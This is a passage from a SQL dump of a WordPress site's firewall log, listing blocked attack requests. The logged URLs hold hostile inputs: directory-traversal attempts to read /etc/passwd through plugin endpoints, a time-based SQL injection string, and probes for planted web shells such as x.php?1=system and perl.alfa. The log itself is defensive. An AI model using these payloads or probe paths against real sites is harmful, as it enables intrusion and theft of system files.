AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twcm9ncmVzc2ZpbGVd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL2Z1bmN0aW9ucy9wcm9ncmVzcy1jaGVjay5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(11998,1674812770.970199,1674812770.511000,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=uploadFontIcon',NULL,'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11999,1674812770.824038,1674812770.644600,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tjZmdd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy9ncmFjZW1lZGlhLW1lZGlhLXBsYXllci90ZW1wbGF0ZXMvZmlsZXMvYWpheF9jb250cm9sbGVyLnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(12000,1674812770.823761,1674812770.636600,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/forum?subscribe_topic=1+union+select+1+and+sleep%286%29',NULL,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzdWJzY3JpYmVfdG9waWNd\",\"paramValue\":\"MSB1bmlvbiBzZWxlY3QgMSBhbmQgc2xlZXAoNik=\",\"path\":\"L2Zhdmljb24uaWNvL2ZvcnVt\",\"category\":\"sqli\",\"ssl\":1}'),(12001,1674812769.870681,1674812769.740700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L2Zhdmljb24uaWNvL3dwLWNvbnRlbnQvcGx1Z2lucy93ZWNoYXQtYnJvYWRjYXN0L3dlY2hhdC9JbWFnZS5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(12002,1674819849.795903,1674819849.685800,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12003,1674819849.643702,1674819849.531000,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(12004,1674819849.488549,1674819849.370500,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12005,1674819849.359886,1674819849.225000,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12006,1674819849.328384,1674819849.192200,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12007,1674819849.109973,1674819848.974900,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12008,1674819849.109763,1674819848.973600,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12009,1674824254.249602,1674824254.119000,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ip-logger/chart/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pcC1sb2dnZXIvY2hhcnQvb2ZjX3VwbG9hZF9pbWFnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12010,1674828818.599418,1674828818.489200,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12011,1674828816.088508,1674828815.969600,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/x.php?1=system','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12012,1674828813.623119,1674828813.511700,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=..%2F..%2F..%2Fx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4veC5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL2luY2x1ZGVzL2JhcmNvZGUucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(12013,1674828811.239873,1674828811.104600,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/html2wp/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9odG1sMndwL2FicnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12014,1674828808.915933,1674828808.786900,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin.php?page=html2wp-settings','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12015,1674828806.410494,1674828806.294900,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/wp_live_chat/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cF9saXZlX2NoYXQvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12016,1674828804.108519,1674828803.996300,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-json/wp_live_chat_support/v1/remote_upload','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWpzb24vd3BfbGl2ZV9jaGF0X3N1cHBvcnQvdjEvcmVtb3RlX3VwbG9hZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12017,1674828800.592561,1674828800.445000,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(12018,1674828797.682033,1674828797.558400,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12019,1674828795.094260,1674828794.946900,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12020,1674828792.874847,1674828792.761600,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9pbXBvcnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12021,1674828790.454871,1674828790.344900,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12022,1674828787.907077,1674828787.792600,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12023,1674828784.755915,1674828784.639200,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12024,1674828782.439157,1674828782.328400,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 